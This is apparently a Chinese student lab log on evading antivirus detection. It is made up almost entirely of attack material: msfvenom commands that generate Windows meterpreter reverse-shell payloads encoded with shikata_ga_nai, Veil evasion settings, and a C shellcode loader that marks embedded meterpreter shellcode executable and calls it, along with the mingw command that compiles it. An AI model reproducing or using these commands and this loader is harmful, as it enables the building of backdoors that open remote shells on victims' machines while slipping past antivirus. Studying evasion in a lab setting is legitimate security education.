将上次实验生成的后门程序放到virscan上python
咦?为啥说有广告,只能改个名啦linux
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.206.132 LPORT=5205 -f exe > 5205-encode10.exe
use evasion use python/meterpreter/rev_tcp.py set LHOST 192.168.206.132 set LPORT 5205
generate
生成payload,名字设为payload5205.list
查看能够use啥,看到了这个7,咱们从新作一遍上面的设置。use evasion use 7 set LHOST 192.168.206.132 set LPORT 5205
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.132 LPORT=443 -f c
生成shellcodei686-w64-mingw32-g++ 5205.c -o 5205.exe
将.c文件转换为可执行文件5205.exe#include "stdafx.h" #include <windows.h> #include <winbase.h> #include <stdio.h> #include <stdlib.h> #include <string.h> //192.168.6.129 443 reverse_tcp const char met[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "此处省去若干行" "\x53\xff\xd5"; int main() { DWORD old = 0; BOOL ret = VirtualProtect((LPVOID)met, strlen(met), PAGE_EXECUTE_READWRITE, &old); INT32 * addr; addr =(INT32*) &met; __asm; { call addr; } return 0; }
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 10 LHOST=192.168.206.132 LPORT=5205 -f c